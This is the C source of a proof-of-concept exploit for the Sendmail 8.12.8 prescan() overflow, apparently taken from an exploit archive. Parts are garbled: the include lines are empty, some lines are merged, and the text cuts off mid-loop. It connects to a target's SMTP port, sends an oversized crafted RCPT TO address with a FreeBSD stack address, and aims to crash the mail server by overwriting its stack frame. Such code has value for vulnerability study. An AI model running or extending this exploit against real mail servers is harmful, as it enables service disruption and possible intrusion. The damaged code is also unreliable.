Sendmail <= 8.12.8 prescan() proof of concept BSD exploit

    
 
/*
                              * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
                              * 
                              * This is to prove that sendmail 8.12.8 and below are vulnerable to the prescan() bug.
                              * On successful POC exploitation the program should crash with the following:
                              *
                              * Program received signal SIGSEGV, Segmentation fault.
                              * 0x5c5c5c5c in ?? ()
                              *
                              */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

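                              /*
                               * Per-target stack layout parameters used by this PoC.  The table is
                               * indexed by the target number given on the command line; main() checks
                               * that index against maxarch, so maxarch is derived from the table below
                               * rather than hard-coded, and cannot drift when an entry is added or removed.
                               */
                              struct arch {
                                  char *os;           // Human-readable OS/version label for this entry
                                  int pos;            // The position of ebp in the stack, with the last byte being 0x00
                                  int apos;           // The amount of bytes after pvpbuf where ebp is located
                                  unsigned long addr; // The pointer to the addr buffer (copied into the request buffer by main())
                              } archs[] = {
                                  { .os = "FreeBSD 4.7-RELEASE", .pos = 180, .apos = 28, .addr = 0xbfbfdad1 },
                              };

                              /* Number of entries in archs[]; sizeof on a completed array is a constant expression. */
                              int maxarch = (int)(sizeof archs / sizeof archs[0]);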


                              /////////////////////////////////////////////////////////

                              #define BUFSIZE 50096

                              /* Print the program banner to stdout; used before the target list and before the run. */
                              void header() {
                                  fputs("Sendmail 8.12.8 prescan() exploit by bysin\n\n", stdout);
                              }

                              void printtargets() {
                              unsigned long i;
                              header();
                              printf("\t  Target\t Addr\t\t OS\n");
                              printf("\t-------------------------------------------\n");
                              for (i=0;i \n",argv[0]);
                              printtargets();
                              return 0;
                              }
                              target=atol(argv[2]);
                              if (target < 0 || target >= maxarch) {
                              printtargets();
                              return 0;
                              }

                              header();

                              if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                              printf("Unable to create socket\n");
                              exit(0);
                              }
                              server.sin_family = AF_INET;
                              server.sin_port = htons(25);
                              printf("Resolving address... ");
                              fflush(stdout);
                              if ((ipaddr = inet_addr(argv[1])) == -1) {
                              struct hostent *hostm;
                              if ((hostm=gethostbyname(argv[1])) == NULL) {
                              printf("Unable to resolve address\n");
                              exit(0);
                              }
                              memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
                              }
                              else server.sin_addr.s_addr = ipaddr;
                              memset(&(server.sin_zero), 0, 8);
                              printf("Address found\n");
                              printf("Connecting... ");
                              fflush(stdout);
                              if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
                              printf("Unable to connect\n");
                              exit(0);
                              }
                              printf("Connected\n");
                              printf("Sending exploit... \n");
                              fflush(stdout);

                              readsocket(sock,220);

                              writesocket(sock,"HELO \r\n");
                              readsocket(sock,250);

                              writesocket(sock,"MAIL FROM: \r\n");
                              readsocket(sock,250);

                              memset(buf,0,sizeof(buf));
                              strcpy(buf,"RCPT TO: ");
                              p=buf+strlen(buf);
                              for (i=1,j=0,m=0;i<1242;i++) {
                              if (!(i%256)) {
                              *p++=';';
                              j++;
                              }
                              else {
                              if (j < 4) *p++='A';
                              else {
                                if (m == archs[target].pos) pos=p;
                                //if (m > archs[target].pos) *p++='B'; else
                                *p++='A';
                                m++;
                              }
                              }
                              }
                              if (pos) memcpy(pos,(char*)&archs[target].addr,4);
                              *p++=';';
                              for (i=0;i

   

   
